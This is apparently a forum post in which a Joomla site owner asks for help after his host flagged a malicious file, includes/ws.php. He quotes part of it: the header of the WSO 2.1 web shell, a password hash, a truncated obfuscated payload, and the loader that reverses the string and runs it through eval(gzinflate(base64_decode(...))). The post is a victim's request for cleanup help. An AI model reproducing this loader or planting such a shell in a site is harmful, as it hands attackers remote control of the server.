Possilbe Joomla Hack on My Site: Help!


I need some help. The Dreamhost automatic robots have informed me that I have some malicious coding on my dreamhost account. I have no clue how it came to be or how to find these hacks. One of them apparently is in www.rickyogima.com/includes/ws.php file. I am not sure if (ws.php) is a key file or added by the hackers. When I got to the file I get a prompt to enter a password. I have disabled it but not sure it is a key file.

Here is a picture of what I get:

The coding in the “ws.php” starts off like this

/* WSO 2.1 (Web Shell by oRb) */
$auth_pass = “63a9f0ea7bb98050796b649e85481845”;
$color = “#df5”;
$default_action = ‘FilesMan’;
@define(‘SELF_PATH’, FILE);
$o=‘C8f+0lQNsshplL96mmlZZXjG0RwfmExQO7HS6v+3rxmz0IwlP2bSBkJg0lp8POVwlJarMI/xJFzvzWKsmtRltzuIuki4PQxzJ9XHMq2zvJUb2ez97IXtObcZJTZ2rfQZIPCsn16Zz+…AND GOES ON FOR A PAGE THEN CLOSING WITH…for($i=strlen($o)-1,$e=’’;$i>=0;–$i)$e.=$o[$i];eval(gzinflate(base64_decode($e)));?>”

Any suggestions or feedback for guy who doesn’t know what is what in the Joomla files.




See DreamHost Web Hosting: Abuse Center - Handling exploits